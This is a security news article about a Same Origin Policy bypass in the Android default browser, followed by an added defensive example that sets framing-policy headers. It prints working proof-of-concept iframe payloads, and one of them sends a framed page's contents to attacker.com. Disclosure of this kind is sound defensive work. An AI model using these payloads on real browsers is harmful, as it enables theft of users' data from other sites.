New Vulnerability Found in Android Default Browser - BestCyberNews: Online News Presenter in the present world


New Vulnerability Found in Android Default Browser

A new critical vulnerability has been found in the Android default browser that allows a malicious website to bypass the Same Origin Policy (SOP) and steal a user's data from other websites opened in other tabs.

This vulnerability was discovered by security researcher Rafay Baloch, who found the SOP bypass on his Qmobile Noir A20 running Android Browser 4.2.1, and later verified that the Sony Xperia Tipo, Samsung Galaxy, HTC Wildfire, Motorola and other devices are also affected.

According to Rafay, the issue is caused by the URL parser's improper handling of null bytes.

The Same Origin Policy (SOP) is one of the most important security mechanisms applied in modern browsers. The basic idea behind the SOP is that JavaScript from one origin should not be able to access the properties of a document on another origin.

The origin is formed by the combination of scheme, domain and port, with the port being an exception in IE. There are some exceptions to the SOP, such as the location property and objects with a src attribute.

The following is a proof of concept:

<iframe name="test" src="http://www.rhainfosec.com"></iframe> 
<input type=button value="test" onclick="window.open('\u0000javascript:alert(document.domain)','test')" >

We can see that the code tries to access the document.domain property of a site loaded into an iframe. If you run the PoC from attacker.com in any modern browser, it returns an error, since attacker.com should not be able to access the document.domain property of rhainfosec.com.

Many websites still use frame-busting code to prevent the page from being framed, and the SOP bypass shown here only works when the target site can be framed. Where a site relies on frame-busting code, it can be sidestepped with the sandbox attribute introduced as part of the HTML5 specification, which stops the framed page's scripts, the frame-busting code included, from running.

<iframe name="test" src="http://www.rhainfosec.com" sandbox></iframe>
<input type=button value="test"
onclick="window.open('\u0000javascript:var i=new Image();i.src='//attacker.com?'+document.body.innerHTML;document.body.appendChild(i);','test')" >

Update: A Metasploit module has been released by jvennix-r7 which also supports X-Frame-Options bypass, making it a completely universal exploit.
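As an added example (not code from the article, from Rafay's write-up or from the Metasploit module), the following JavaScript shows the header-based framing controls that replace the frame-busting code discussed above. X-Frame-Options and CSP frame-ancestors are evaluated by the browser from the response headers before the framed document's scripts run, so a sandboxed iframe cannot switch them off the way it silences frame-busting JavaScript. They do not, however, repair the parser bug itself, and the update notes that the module avoids the iframe route altogether; the only complete fix is a patched browser. The function names, the partner host names and the simplified matching rules are this example's own assumptions.

```javascript
// Added example, not from the article: declarative framing policy headers and
// a simplified model of the browser-side frame-ancestors check.

// Response headers for a page that must not be framed at all, or only by the
// listed ancestor origins (source expressions as written in CSP).
function framingHeaders(allowedAncestors = []) {
  if (allowedAncestors.length === 0) {
    return {
      'X-Frame-Options': 'DENY',
      'Content-Security-Policy': "frame-ancestors 'none'",
    };
  }
  // X-Frame-Options cannot express a host list, so SAMEORIGIN is the closest
  // legacy fallback; CSP frame-ancestors carries the full policy and wins
  // in browsers that understand both.
  return {
    'X-Frame-Options': 'SAMEORIGIN',
    'Content-Security-Policy': `frame-ancestors 'self' ${allowedAncestors.join(' ')}`,
  };
}

// Simplified frame-ancestors evaluation. Returns true when a document from
// pageOrigin, served with cspValue, may be embedded by a frame whose origin
// is ancestorOrigin. Supports 'none', 'self', exact origins (with scheme) and
// "scheme://*.host" wildcards; ports on wildcard sources are ignored and
// unparseable sources are skipped, which is a simplification of the spec.
function frameAncestorsAllows(cspValue, pageOrigin, ancestorOrigin) {
  const directive = (cspValue || '')
    .split(';')
    .map((d) => d.trim())
    .find((d) => /^frame-ancestors(\s|$)/.test(d));
  if (!directive) return true; // no directive: CSP places no framing restriction
  const sources = directive.split(/\s+/).slice(1);
  if (sources.includes("'none'")) return false;
  const ancestor = new URL(ancestorOrigin);
  for (const src of sources) {
    if (src === "'self'") {
      if (ancestorOrigin === pageOrigin) return true;
      continue;
    }
    const wildcard = /^([a-z][a-z0-9+.-]*):\/\/\*\.(.+)$/i.exec(src);
    if (wildcard) {
      if (`${wildcard[1].toLowerCase()}:` === ancestor.protocol &&
          ancestor.hostname.endsWith(`.${wildcard[2].toLowerCase()}`)) {
        return true;
      }
      continue;
    }
    try {
      if (new URL(src).origin === ancestor.origin) return true;
    } catch (e) {
      // not an absolute URL: skipped in this simplified model
    }
  }
  return false;
}

// Convenience wrapper: would the headers we emit block framing by ancestorOrigin?
function framingBlocked(headers, pageOrigin, ancestorOrigin) {
  return !frameAncestorsAllows(headers['Content-Security-Policy'], pageOrigin, ancestorOrigin);
}

// Demonstration with the hosts from the article (partner hosts are placeholders).
const denyAll = framingHeaders();
console.log(denyAll);
console.log('attacker.com may frame rhainfosec.com:',
  !framingBlocked(denyAll, 'http://www.rhainfosec.com', 'http://attacker.com')); // false
```

In a Node http handler the headers object is applied with `Object.entries(framingHeaders()).forEach(([k, v]) => res.setHeader(k, v))`; the same two headers can be set by any web server or reverse proxy.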

Author: Venkatesh Yalagandula